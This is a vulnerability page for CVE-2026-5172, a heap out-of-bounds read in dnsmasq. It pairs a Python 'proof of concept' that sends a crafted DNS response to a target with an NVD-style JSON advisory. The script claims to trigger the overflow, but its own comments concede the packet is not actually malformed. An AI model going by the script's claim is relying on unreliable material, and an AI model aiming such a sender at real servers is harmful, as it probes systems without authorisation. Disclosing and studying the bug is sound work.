CVE-2026-5172

import socket import struct # Conceptual Proof of Concept for CVE-2026-5172 # This script sends a malformed DNS response to trigger the buffer overflow. # Note: This is for educational purposes only. def create_malformed_dns_packet(): # DNS Header # ID: 0x1337, Flags: Response (0x8180), QDCOUNT: 1, ANCOUNT: 1, NSCOUNT: 0, ARCOUNT: 0 header = struct.pack('!HHHHHH', 0x1337, 0x8180, 1, 1, 0, 0) # Question Section (example.com) question = b'\x07example\x03com\x00' question += struct.pack('!HH', 1, 1) # Type A, Class IN # Answer Section (Malformed) # The vulnerability involves the pointer in name compression or label length. # We construct a name that might cause extract_name() to advance incorrectly. # Using a specific label length or pointer offset to test boundaries. answer_name = b'\xc0\x0c' # Pointer to offset 12 (start of question name) answer_type = struct.pack('!H', 1) answer_class = struct.pack('!H', 1) answer_ttl = struct.pack('!I', 60) answer_rdlength = struct.pack('!H', 4) answer_rdata = b'\x01\x02\x03\x04' # In a real exploit, the specific bytes would be crafted to bypass checks # and trigger the heap out-of-bounds read in extract_addresses(). answer = answer_name + answer_type + answer_class + answer_ttl + answer_rdlength + answer_rdata return header + question + answer def send_poc(target_ip, target_port=53): try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) packet = create_malformed_dns_packet() sock.sendto(packet, (target_ip, target_port)) print(f"[+] Malformed DNS packet sent to {target_ip}:{target_port}") sock.close() except Exception as e: print(f"[-] Error sending packet: {e}") if __name__ == "__main__": # Replace with the target IP running dnsmasq target = "127.0.0.1" send_poc(target)

{"cve": {"id": "CVE-2026-5172", "sourceIdentifier": "[email protected]", "published": "2026-05-11T18:16:41.920", "lastModified": "2026-05-13T14:17:59.083", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A buffer overflow in dnsmasq’s extract_addresses() function allows an attacker to trigger a heap out-of-bounds read and crash by exploiting a malformed DNS response, enabling extract_name() to advance the pointer past the record’s end."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "references": [{"url": "https://github.com/NixOS/nixpkgs/pull/519082", "source": "[email protected]"}, {"url": "https://github.com/NixOS/nixpkgs/pull/519093", "source": "[email protected]"}, {"url": "https://github.com/pi-hole/FTL/releases/tag/v6.6.2", "source": "[email protected]"}, {"url": "https://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2026q2/018471.html", "source": "[email protected]"}, {"url": "https://thekelleys.org.uk/dnsmasq/CVE/", "source": "[email protected]"}, {"url": "https://www.kb.cert.org/vuls/id/471747", "source": "[email protected]"}]}}